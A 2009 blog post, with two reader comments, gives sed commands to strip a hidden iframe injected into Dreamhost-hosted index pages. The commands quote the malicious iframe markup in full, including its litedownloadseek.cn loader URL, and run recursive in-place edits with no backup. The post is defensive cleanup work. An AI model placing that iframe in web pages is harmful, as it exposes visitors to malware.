Today evening some of the Dreamhost servers (also one of our client’s) where attacked by some unknown hackers. One line of code where injected to index.php, index.html etc, which will takedown the site.

Here is a quick fix for it. Run these two commands in bash shell of your Dreamhost server. They will remove the injected code from the files.

sed -i 's/<\/iframe><\/body><\/html>//g' `grep "litedownloadseek" * -r -l`
sed -i 's/<iframe src="\" mce_src="\""http:\/\/litedownloadseek.cn\/in.cgi?cocacola7\" width=1 height=1 style="\" mce_style="\""visibility: hidden\"><\/iframe>//g' `grep "litedownloadseek" * -r -l`
</pre>
<blockquote><p>Disclaimer: Use at your own risk! But this worked for us! :)</p></blockquote>

2 Responses to “Quick fix for code inject attack on Dreamhost Servers!”

1. Gnanesh, on January 16th, 2009 at 6:42 AM Said:

   Thanks NetBramha. It worked for me too!!

2. Saneef, on January 28th, 2009 at 10:07 AM Said:

   @Bharath Recently some of the sites hosted on dreamhost got compromised, where some external code where inserted in the index pages. This will remove those injected codes.

Leave a Reply

Name (required)

Mail (will not be published) (required)

Website